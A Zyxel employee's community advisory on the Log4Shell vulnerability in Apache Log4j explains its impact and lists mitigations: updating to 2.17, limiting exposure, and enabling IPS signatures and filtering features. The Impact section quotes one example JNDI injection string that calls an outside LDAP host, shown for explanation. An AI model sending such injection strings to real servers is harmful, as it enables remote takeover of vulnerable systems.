Guard against Log4Shell
Zyxel Employee
What is Vulnerable Log4j Package?
Log4j is an open-source project that is widely used for logging in JAVA. Log4j was found a remote code injection in the version between 2.x.x and 2.14.x. (However, a new exploit for log4j, CVE-2021-45046, was also found in 2.15. We recommend to update to the version 2.17). That allows attackers to send a special-formed command to get the remote shell (Log4shell) easily.
Impact
This vulnerability got the highest score (10) in CVSS since the log4j package is widely used and the vulnerability can be executed remotely. If the server is vulnerable, attackers can send commands (such as $jndi:ldap://example.com/a) to the log4j package and get the shell to take over the server. As the host is compromised, the host could be used as a bot, miner or encrypted your important files by ransomware.
Zyxel Security Appliances Against for Log4Shell
Zyxel is aware of remote code execution (RCE) vulnerabilities in Apache Log4j and confirms that all its security products are NOT affected [1]. Zyxel ATP/USG FLEX/USG Series firewalls provide multiple layer protection to help you against the attack.
Mitigation
1. On host: Recommend to update to the latest version of Apache Log4j (>=2.17.0).
2. On Network:
- To reduce the attack surface, don’t publish the vulnerable applications to Internet unless it's absolutely necessary. Leveraging the VPN technology for remote access to the applications.
- Update to the latest version of IPS signature and then enable the IPS function to protect your host. If your host uses SSL/TLS transmission, you should also enable SSL inspection for further detection. When the attack comes from the malicious IP address, the IP reputation feature defenses you against the attack from the IP address.
- Enable DNS filter, URL filter, Content Filter, AntiVirus and Sanbox features can also break the attack chain to avoid further infection.
Please refer to the signature information
ATP/USG FLEX/USG series:
v4.0.x.20211217.0
# Signature ID 131026, 131027 and 131028 are used for CVE-2021-44228.
# Signature ID 131029 and 131030 are used for CVE-2021-45046.
Reference
[1] Zyxel security advisory for Apache Log4j RCE vulnerabilities, https://www.zyxel.com/support/Zyxel_security_advisory_for_Apache_Log4j_RCE_vulnerability.shtml
Revision history
2021-12-17: Initial release
Categories
- All Categories
- 383 Beta Program
- 2.1K Nebula
- 116 Nebula Ideas
- 80 Nebula Status and Incidents
- 5.1K Security
- 76 USG FLEX H Series
- 247 Security Ideas
- 1.3K Switch
- 69 Switch Ideas
- 907 WirelessLAN
- 34 WLAN Ideas
- 5.9K Consumer Product
- 209 Service & License
- 335 News and Release
- 71 Security Advisories
- 21 Education Center
- 5 [Campaign] Zyxel Network Detective
- 1.9K FAQ
- 890 Nebula FAQ
- 415 Security FAQ
- 233 Switch FAQ
- 203 WirelessLAN FAQ
- 46 Consumer Product FAQ
- 137 Service & License FAQ
- 34 Documents
- 34 Nebula Monthly Express
- 73 About Community
- 62 Security Highlight